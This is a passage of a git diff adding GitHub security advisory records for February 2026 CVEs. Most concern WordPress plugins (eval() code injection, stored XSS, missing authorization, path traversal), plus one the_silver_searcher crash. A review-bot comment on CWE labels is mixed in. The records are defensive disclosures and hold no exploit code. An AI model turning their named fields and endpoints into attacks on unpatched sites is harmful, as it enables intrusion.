+ "details": "A security vulnerability has been detected in ggreer the_silver_searcher up to 2.2.0. The impacted element is the function search_stream of the file src/search.c. The manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2642"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ggreer/the_silver_searcher/issues/1558"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ggreer/the_silver_searcher"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/oneafter/0119/blob/main/segv1"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346398"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346398"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.752769"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T07:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9x54-6v7m-8wf2/GHSA-9x54-6v7m-8wf2.json b/advisories/unreviewed/2026/02/GHSA-9x54-6v7m-8wf2/GHSA-9x54-6v7m-8wf2.json
new file mode 100644
index 0000000000000..a4b70b7c5882b
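Review bot: `cwe_ids` holds only `CWE-404` (improper resource shutdown or release), while `details` describes a null pointer dereference in `search_stream` of `src/search.c`; the specific class is `CWE-476`, and any filter or report keyed on that id will miss this record. I would list `"CWE-476"` here, alongside or instead of the generic entry. GHSA-cwvx-vcjx-vqjc in this patch is similar: input passed to `eval()` is tagged `CWE-74` where `CWE-94` (code injection) is the precise id. Both values likely mirror the upstream CNA data, so the correction may belong there rather than in this sync.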
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9x54-6v7m-8wf2/GHSA-9x54-6v7m-8wf2.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9x54-6v7m-8wf2",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-25421"
+ ],
+ "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority. Collision with another CVE.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25421"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T08:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-cwvx-vcjx-vqjc/GHSA-cwvx-vcjx-vqjc.json b/advisories/unreviewed/2026/02/GHSA-cwvx-vcjx-vqjc/GHSA-cwvx-vcjx-vqjc.json
new file mode 100644
index 0000000000000..0c1143260740c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-cwvx-vcjx-vqjc/GHSA-cwvx-vcjx-vqjc.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cwvx-vcjx-vqjc",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-2019"
+ ],
+ "details": "The Cart All In One For WooCommerce plugin for WordPress is vulnerable to Code Injection in all versions up to, and including, 1.1.21. This is due to insufficient input validation on the 'Assign page' field which is passed directly to the eval() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute arbitrary PHP code on the server.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2019"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/woo-cart-all-in-one/tags/1.1.21/includes/frontend/sidebar-cart-icon.php#L245"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/woo-cart-all-in-one/trunk/includes/frontend/sidebar-cart-icon.php#L245"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3455202"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/25bdb89f-3478-4a1a-8bf0-46e88207eb21?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T07:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-cxr2-7xvc-hh42/GHSA-cxr2-7xvc-hh42.json b/advisories/unreviewed/2026/02/GHSA-cxr2-7xvc-hh42/GHSA-cxr2-7xvc-hh42.json
new file mode 100644
index 0000000000000..595643344c0d5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-cxr2-7xvc-hh42/GHSA-cxr2-7xvc-hh42.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cxr2-7xvc-hh42",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-1649"
+ ],
+ "details": "The Community Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ce_venue_name' parameter in all versions up to, and including, 1.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1649"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.7/community-events.php#L1403"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.7/community-events.php#L779"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/community-events/trunk/community-events.php#L1403"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456114%40community-events&new=3456114%40community-events&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c44232a9-7b97-449c-b584-ca3c26d63581?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T09:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-g6wj-gw42-4345/GHSA-g6wj-gw42-4345.json b/advisories/unreviewed/2026/02/GHSA-g6wj-gw42-4345/GHSA-g6wj-gw42-4345.json
new file mode 100644
index 0000000000000..29943494063e7
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-g6wj-gw42-4345/GHSA-g6wj-gw42-4345.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g6wj-gw42-4345",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-1938"
+ ],
+ "details": "The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized license key deletion due to a missing authorization check on the `/yaymail-license/v1/license/delete` REST endpoint in versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to delete the plugin's license key via the '/yaymail-license/v1/license/delete' endpoint granted they can obtain the REST API nonce.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1938"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/License/RestAPI.php#L142"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/yaymail/trunk/src/License/RestAPI.php#L142"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3460087"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ce57b12-2241-416b-b466-aa06ca8c7551?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T08:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-gch6-cfhh-c44p/GHSA-gch6-cfhh-c44p.json b/advisories/unreviewed/2026/02/GHSA-gch6-cfhh-c44p/GHSA-gch6-cfhh-c44p.json
new file mode 100644
index 0000000000000..fd16389e309a2
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-gch6-cfhh-c44p/GHSA-gch6-cfhh-c44p.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gch6-cfhh-c44p",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-2633"
+ ],
+ "details": "The Gutenberg Blocks with AI by Kadence WP plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.6.1. This is due to a missing capability check in the `process_image_data_ajax_callback()` function which handles the `kadence_import_process_image_data` AJAX action. The function's authorization check via `verify_ajax_call()` only validates `edit_posts` capability but fails to check for the `upload_files` capability. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary images from remote URLs to the WordPress Media Library, bypassing the standard WordPress capability restriction that prevents Contributors from uploading files.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2633"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.5.32/includes/class-kadence-blocks-prebuilt-library.php#L1177"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.5.32/includes/class-kadence-blocks-prebuilt-library.php#L789"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3454881%40kadence-blocks%2Ftrunk&old=3453204%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9c06e0a9-a13a-4cee-a1a5-c43c114b2dbf?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T07:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-gmgx-8hxg-f53q/GHSA-gmgx-8hxg-f53q.json b/advisories/unreviewed/2026/02/GHSA-gmgx-8hxg-f53q/GHSA-gmgx-8hxg-f53q.json
new file mode 100644
index 0000000000000..5bafb011047c5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-gmgx-8hxg-f53q/GHSA-gmgx-8hxg-f53q.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gmgx-8hxg-f53q",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-1943"
+ ],
+ "details": "The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via settings in all versions up to, and including, 4.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Shop Manager-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1943"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/Controllers/TemplateController.php#L194"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/templates/elements/order-details.php#L123"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/templates/elements/text.php#L38"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3460087%40yaymail&new=3460087%40yaymail&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/73b4e5a2-bf75-4df9-a816-2cc858947c39?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T08:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-gxvp-w433-832f/GHSA-gxvp-w433-832f.json b/advisories/unreviewed/2026/02/GHSA-gxvp-w433-832f/GHSA-gxvp-w433-832f.json
new file mode 100644
index 0000000000000..0677cdb9d52e9
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-gxvp-w433-832f/GHSA-gxvp-w433-832f.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gxvp-w433-832f",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-1831"
+ ],
+ "details": "The YayMail - WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized plugin installation and activation due to missing capability checks on the 'yaymail_install_yaysmtp' AJAX action and `/yaymail/v1/addons/activate` REST endpoint in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to install and activate the YaySMTP plugin.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1831"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/Ajax.php#L183"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/Controllers/AddonController.php#L76"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/yaymail/trunk/src/Ajax.php#L183"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3460087%40yaymail&new=3460087%40yaymail&sfp_email=&sfph_mail=#file11"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a568162a-5a2d-47ab-9dfe-2f2f5f324f0d?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T08:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-h92c-7ccr-x4hr/GHSA-h92c-7ccr-x4hr.json b/advisories/unreviewed/2026/02/GHSA-h92c-7ccr-x4hr/GHSA-h92c-7ccr-x4hr.json
new file mode 100644
index 0000000000000..67544cd09a67d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-h92c-7ccr-x4hr/GHSA-h92c-7ccr-x4hr.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h92c-7ccr-x4hr",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-1860"
+ ],
+ "details": "The Kali Forms plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.4.8. This is due to the `get_items_permissions_check()` permission callback on the `/kaliforms/v1/forms/{id}` REST API endpoint only checking for the `edit_posts` capability without verifying that the requesting user has ownership or authorization over the specific form resource. This makes it possible for authenticated attackers, with Contributor-level access and above, to read form configuration data belonging to other users (including administrators) by enumerating form IDs. Exposed data includes form field structures, Google reCAPTCHA secret keys (if configured), email notification templates, and server paths.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1860"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/kali-forms/tags/2.4.8/Inc/Backend/Rest/class-forms-rest-controller.php#L116"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/kali-forms/tags/2.4.8/Inc/Backend/Rest/class-forms-rest-controller.php#L251"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/kali-forms/tags/2.4.8/Inc/Backend/Rest/class-forms-rest-controller.php#L62"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3460047/kali-forms/trunk?contextall=1&old=3435823&old_path=%2Fkali-forms%2Ftrunk"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a1529c89-5c5e-4a2d-be31-b55d2907c9b6?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T08:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jh7f-pj8r-h37c/GHSA-jh7f-pj8r-h37c.json b/advisories/unreviewed/2026/02/GHSA-jh7f-pj8r-h37c/GHSA-jh7f-pj8r-h37c.json
new file mode 100644
index 0000000000000..529876aa4f7e3
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jh7f-pj8r-h37c/GHSA-jh7f-pj8r-h37c.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jh7f-pj8r-h37c",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-1655"
+ ],
+ "details": "The EventPrime plugin for WordPress is vulnerable to unauthorized post modification due to missing authorization checks in all versions up to, and including, 4.2.8.4. This is due to the save_frontend_event_submission function accepting a user-controlled event_id parameter and updating the corresponding event post without enforcing ownership or capability checks. This makes it possible for authenticated (Customer+) attackers to modify posts created by administrators by manipulating the event_id parameter granted they can obtain a valid nonce.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1655"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/tags/4.2.8.1/includes/class-ep-ajax.php#L741"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/tags/4.2.8.1/includes/class-ep-ajax.php#L798"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-ep-ajax.php#L741"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-ep-ajax.php#L798"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3455239%40eventprime-event-calendar-management%2Ftrunk&old=3452796%40eventprime-event-calendar-management%2Ftrunk&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0e2a2769-1309-4aad-8411-4445efea2b66?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T08:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json b/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json
new file mode 100644
index 0000000000000..0a3cb7dbead1e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p572-g32f-hp32",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-2296"
+ ],
+ "details": "The Product Addons for Woocommerce – Product Options with Custom Fields plugin for WordPress is vulnerable to Code Injection in all versions up to, and including, 3.1.0. This is due to insufficient input validation of the 'operator' field in conditional logic rules within the evalConditions() function, which passes unsanitized user input directly to PHP's eval() function. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject and execute arbitrary PHP code on the server via the conditional logic 'operator' parameter when saving addon form field rules.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2296"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/tags/3.0.19/includes/process/conditional-logic.php#L104"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/tags/3.0.19/includes/process/conditional-logic.php#L84"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/trunk/includes/process/conditional-logic.php#L104"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/trunk/includes/process/conditional-logic.php#L84"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3458823%40woo-custom-product-addons&new=3458823%40woo-custom-product-addons&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c1edd7-2421-4dfa-8775-ca0497759d52?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T07:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json b/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json
new file mode 100644
index 0000000000000..454dd1a293821
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-q7cc-x725-hp7g",
+ "modified": "2026-02-18T09:31:03Z",
+ "published": "2026-02-18T09:31:03Z",
+ "aliases": [
+ "CVE-2026-1807"
+ ],
+ "details": "The InteractiveCalculator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'interactivecalculator' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1807"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/interactivecalculator/tags/1.0.1/interactivecalculator.php#L44"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456849%40interactivecalculator&new=3456849%40interactivecalculator&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456870%40interactivecalculator&new=3456870%40interactivecalculator&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5c38f080-59c7-4201-9e87-87ee9ab6b97b?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T07:16:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json b/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json
new file mode 100644
index 0000000000000..0c1f57574dbb5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-q7wp-4j7p-g4vj",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-2419"
+ ],
+ "details": "The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'download_path' configuration parameter. This is due to insufficient validation of the download path setting, which allows directory traversal sequences to bypass the WP_CONTENT_DIR prefix check. This makes it possible for authenticated attackers, with Administrator-level access and above, to configure the plugin to list and access arbitrary files on the server by exploiting the file browser functionality.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2419"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lesterchan/wp-downloadmanager/commit/416b9f5459496166c0395f9e055d4c4cf872404a"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/tags/1.69/download-options.php#L42"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/trunk/download-options.php#L42"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0bb96da1-9c17-4264-ac29-b5ff8dec745d?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
